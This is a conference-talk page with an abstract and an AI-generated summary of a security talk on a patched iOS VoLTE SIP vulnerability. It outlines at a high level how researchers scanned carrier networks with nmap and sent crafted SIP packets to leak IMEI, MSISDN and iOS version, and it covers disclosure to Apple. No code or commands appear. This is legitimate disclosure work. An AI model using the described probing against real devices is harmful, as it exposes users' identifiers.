Hackers of India

Hacking into iOS’s VOLTE implementation

By  Hardik Mehta   Rajanish Pathak  on 25 Aug 2023 @ Hitb Sec Conf


Presentation Material

Abstract

In this talk, we will be discussing a critical security vulnerability we discovered in the Voice over LTE (VoLTE) interface of iOS devices, including iPhones and Apple Watches.

This vulnerability has been present in the iOS operating system since the inception of 4G VoLTE. We will shed light on the issue, its root cause, and how it arises due to improper implementation of GSMA guidelines, highlighting a design flaw in the implementation of the iOS IMS SIP agent.

We will delve into the technical details of the vulnerability, providing a comprehensive analysis of its impact on iOS devices and the potential risks it poses to users’ privacy and security. We will also explore the challenges faced during the discovery and disclosure of the vulnerability to Apple and discuss the response and mitigation measures taken by the company.

AI Generated Summarymay contain errors

Here is a summarized version of the content:

The speaker discusses a vulnerability discovery in iOS devices, specifically with the SIP (Session Initiation Protocol) component. They used nmap to scan an entire network and found millions of iOS devices responding to their queries. They crafted a SIP packet to interact with these devices, which responded even though they were already connected to IMS (IP Multimedia Subsystem). This vulnerability allowed attackers to directly communicate with the victim device without registering any traffic, making it difficult to track or log.

The attacker could obtain sensitive information such as IMEI number, MSISDN, and iOS version, which could be used for targeted attacks. The vulnerability was mitigated by Apple by following GSM guidelines and terminating socket connections to Port 5060, ensuring that only trusted incoming traffic is accepted.

The discovery timeline included initial reporting to Apple in March 2021, with a fix implemented but bypassed. A second fix was released in iOS 15.2, which resolved the issue. The speaker emphasizes that finding critical vulnerabilities doesn’t require advanced expertise and encourages further exploration of similar issues.

Additionally, the speaker mentions that they have started fuzzing the SIP component to discover more vulnerabilities and promises to share their findings in future presentations.